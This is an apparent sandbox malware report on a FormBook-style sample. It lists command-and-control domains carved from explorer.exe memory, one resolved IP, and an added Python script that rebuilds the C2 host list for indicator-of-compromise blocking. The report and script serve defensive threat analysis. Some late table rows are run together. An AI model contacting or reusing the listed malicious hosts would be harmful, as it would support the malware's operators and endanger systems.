www.ehills.shop/m25s/ | 0% | Avira URL Cloud | safe
http://www.orean-course-289113002.zone | 0% | Avira URL Cloud | safe
http://www.newordforpurpose.info | 0% | Avira URL Cloud | safe
http://www.ehills.shop/m25s/ | 0% | Avira URL Cloud | safe
http://www.orean-course-289113002.zoneReferer: | 0% | Avira URL Cloud | safe
http://www.ealthcare-trends-60670.bond/m25s/ | 0% | Avira URL Cloud | safe
http://www.onnorbell.design | 0% | Avira URL Cloud | safe
http://www.oches-a-credito-es.bond | 0% | Avira URL Cloud | safe
http://www.ental-health-69511.bond/m25s/ | 0% | Avira URL Cloud | safe
http://www.xewaov.xyz/m25s/www.39474.club | 0% | Avira URL Cloud | safe
http://www.orean-course-289113002.zone/m25s/www.ransportationmwmptpro.top | 0% | Avira URL Cloud | safe
http://www.ransportationmwmptpro.top | 0% | Avira URL Cloud | safe
http://www.ransportationmwmptpro.top/m25s/www.newordforpurpose.info | 0% | Avira URL Cloud | safe
http://www.vitor.live/m25s/www.raceg.cyou | 0% | Avira URL Cloud | safe
http://www.oches-a-credito-es.bond/m25s/ | 0% | Avira URL Cloud | safe
http://www.armanshop.xyz/m25s/ | 0% | Avira URL Cloud | safe
http://www.onnorbell.designReferer: | 0% | Avira URL Cloud | safe
http://www.ehills.shop/m25s/www.uy-smart-tv-nl.today | 0% | Avira URL Cloud | safe
http://www.39474.clubReferer: | 0% | Avira URL Cloud | safe
http://www.cctofi.cpa | 0% | Avira URL Cloud | safe
http://www.cctofi.cpaReferer: | 0% | Avira URL Cloud | safe
http://www.ental-health-69511.bond | 0% | Avira URL Cloud | safe
http://www.uy-smart-tv-nl.today | 0% | Avira URL Cloud | safe
http://www.oches-a-credito-es.bondReferer: | 0% | Avira URL Cloud | safe
http://www.newordforpurpose.info/m25s/ | 0% | Avira URL Cloud | safe
http://www.wistlnc.netReferer: | 0% | Avira URL Cloud | safe
http://www.ental-health-69511.bondReferer: | 0% | Avira URL Cloud | safe
http://www.xewaov.xyz | 0% | Avira URL Cloud | safe
http://www.ehills.shop | 0% | Avira URL Cloud | safe
http://www.vitor.liveReferer: | 0% | Avira URL Cloud | safe
http://www.onnorbell.design/m25s/ | 0% | Avira URL Cloud | safe
http://www.cctofi.cpa/m25s/ | 0% | Avira URL Cloud | safe
http://www.ealthcare-trends-60670.bondReferer: | 0% | Avira URL Cloud | safe
http://www.orean-course-289113002.zone/m25s/ | 0% | Avira URL Cloud | safe
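Every C2-related string in the table above shares the URI prefix /m25s/, and several strings have the form www.A/m25s/www.B, which is what memory carving produces when two entries of a null-separated list sit next to each other. The script below is an added example, not part of the Joe Sandbox report: it takes a subset of the strings from the table (copied verbatim), strips the "Referer:" header name that was glued onto some of them, treats /m25s/ as the marker for the C2 list (an assumption about this sample's config, grounded only in the table), and follows the A-to-B adjacencies into ordered runs. The ordering of the runs is an inference from string adjacency in memory, not something the report states; the distinct host set is what the IOC list should contain.

```python
"""Recover the C2 host list of this FormBook sample from URL strings carved out
of explorer.exe memory. Added example; the strings are copied from the report's
URL table, the /m25s/ marker and the adjacency interpretation are assumptions."""
from __future__ import annotations

import re

# Copied from the Avira URL Cloud table above. The "Referer:" tails and the
# "www.A/m25s/www.B" concatenations are carving artifacts, not requested URLs.
REPORT_URLS = [
    "http://www.wistlnc.net/m25s/www.armanshop.xyz",
    "http://www.armanshop.xyz/m25s/www.ehills.shop",
    "http://www.ehills.shop/m25s/www.uy-smart-tv-nl.today",
    "http://www.uy-smart-tv-nl.today/m25s/www.vitor.live",
    "http://www.vitor.live/m25s/www.raceg.cyou",
    "http://www.raceg.cyou/m25s/www.cctofi.cpa",
    "http://www.xewaov.xyz/m25s/www.39474.club",
    "http://www.39474.club/m25s/www.oches-a-credito-es.bond",
    "http://www.ealthcare-trends-60670.bond/m25s/www.ental-health-69511.bond",
    "http://www.orean-course-289113002.zone/m25s/www.ransportationmwmptpro.top",
    "http://www.ransportationmwmptpro.top/m25s/www.newordforpurpose.info",
    "http://www.onnorbell.design/m25s/",
    "http://www.uy-smart-tv-nl.todayReferer:",
    "www.ehills.shop/m25s/",
    "http://www.cctofi.cpaReferer:",
    "http://www.cctofi.cpa",
]

# Assumption: the path every C2 string in the report shares marks the C2 list.
C2_PATH = "/m25s/"
_HOST = re.compile(r"^(?:https?://)?(www\.[a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


def strip_referer(s: str) -> str:
    """Drop the 'Referer:' header name that carving glued onto some strings."""
    return s.split("Referer:", 1)[0]


def hosts_in(s: str) -> list[str]:
    """Hosts in one carved string, in order: 'www.A/m25s/www.B' -> [A, B]."""
    found = []
    for piece in strip_referer(s).split(C2_PATH):
        m = _HOST.match(piece)
        if m:
            found.append(m.group(1).lower())
    return found


def c2_hosts(strings: list[str] = REPORT_URLS) -> set[str]:
    """Distinct hosts seen with, or directly after, the C2 path (IOC set)."""
    return {h for s in strings for h in hosts_in(s)}


def successors(strings: list[str] = REPORT_URLS) -> dict[str, str]:
    """A -> B for every 'www.A/m25s/www.B' string: B followed A in memory."""
    nxt: dict[str, str] = {}
    for s in strings:
        hs = hosts_in(s)
        for a, b in zip(hs, hs[1:]):
            nxt[a] = b
    return nxt


def chains(strings: list[str] = REPORT_URLS) -> list[list[str]]:
    """Follow the adjacencies into ordered runs, longest first. A host seen
    only on its own is a run of length 1. A run that loops back stops at the
    repeated host; a closed loop with no entry point would not be reported."""
    nxt = successors(strings)
    heads = c2_hosts(strings) - set(nxt.values())
    runs = []
    for head in sorted(heads):
        run: list[str] = []
        cur: str | None = head
        while cur is not None and cur not in run:
            run.append(cur)
            cur = nxt.get(cur)
        runs.append(run)
    return sorted(runs, key=lambda r: (-len(r), r[0]))


if __name__ == "__main__":
    print(f"{len(c2_hosts())} distinct C2 hosts")
    for run in chains():
        print(" -> ".join(run))
```

On the strings above this yields 16 distinct hosts and five runs; the longest runs from www.wistlnc.net through www.cctofi.cpa, and www.onnorbell.design stands alone because no carved string shows a neighbor for it. Only www.vitor.live resolved during the analysis (see the domain table below), so block on the host set, not on the single IP.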
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.vitor.live | 103.224.212.213 | true | true | | unknown
www.armanshop.xyz | unknown | unknown | true | | unknown
www.uy-smart-tv-nl.today | unknown | unknown | true | | unknown
www.onnorbell.design | unknown | unknown | true | | unknown
www.ehills.shop | unknown | unknown | true | | unknown
www.raceg.cyou | unknown | unknown | true | | unknown
www.wistlnc.net | unknown | unknown | true | | unknown
www.cctofi.cpa | unknown | unknown | true | | unknown
www.ealthcare-trends-60670.bond | unknown | unknown | true | | unknown
www.orean-course-289113002.zone | unknown | unknown | true | | unknown
www.ransportationmwmptpro.top | unknown | unknown | true | | unknown
www.ental-health-69511.bond | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
www.ehills.shop/m25s/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://aka.ms/odirmr | explorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.ealthcare-trends-60670.bond/m25s/www.ental-health-69511.bond | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ransportationmwmptpro.top/m25s/ | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000003.00000003.3107210219.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.uy-smart-tv-nl.today/m25s/www.vitor.live | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.armanshop.xyz/m25s/www.ehills.shop | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wistlnc.net | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers | n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.uy-smart-tv-nl.todayReferer: | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.39474.club/m25s/www.oches-a-credito-es.bond | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.39474.club | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.raceg.cyou/m25s/www.cctofi.cpa | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.raceg.cyouReferer: | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.wistlnc.net/m25s/www.armanshop.xyz | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ransportationmwmptpro.topReferer: | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wistlnc.net/m25s/ | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.orean-course-289113002.zone | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | explorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.uy-smart-tv-nl.today/m25s/ | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.ehills.shop/m25s/ | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.newordforpurpose.info | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000003.00000003.3495294226.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C893000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.urwpp.deDPlease | n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.zhongyicts.com.cn | n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.ealthcare-trends-60670.bond/m25s/ | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.orean-course-289113002.zoneReferer: | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wns.windows.com/L | explorer.exe, 00000003.00000002.4180055463.000000000C557000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.oches-a-credito-es.bond | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://word.office.com | explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.onnorbell.design | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.xewaov.xyz/m25s/www.39474.club | explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | explorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false
                                                                          high
                                                                          http://www.ental-health-69511.bond/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.ransportationmwmptpro.top/m25s/www.newordforpurpose.infoexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.ransportationmwmptpro.topexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.orean-course-289113002.zone/m25s/www.ransportationmwmptpro.topexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.armanshop.xyz/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.oches-a-credito-es.bond/m25s/explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.carterandcone.comln0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.fontbureau.com/designers/frere-user.htmln0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.vitor.live/m25s/www.raceg.cyouexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.onnorbell.designReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://outlook.com_explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
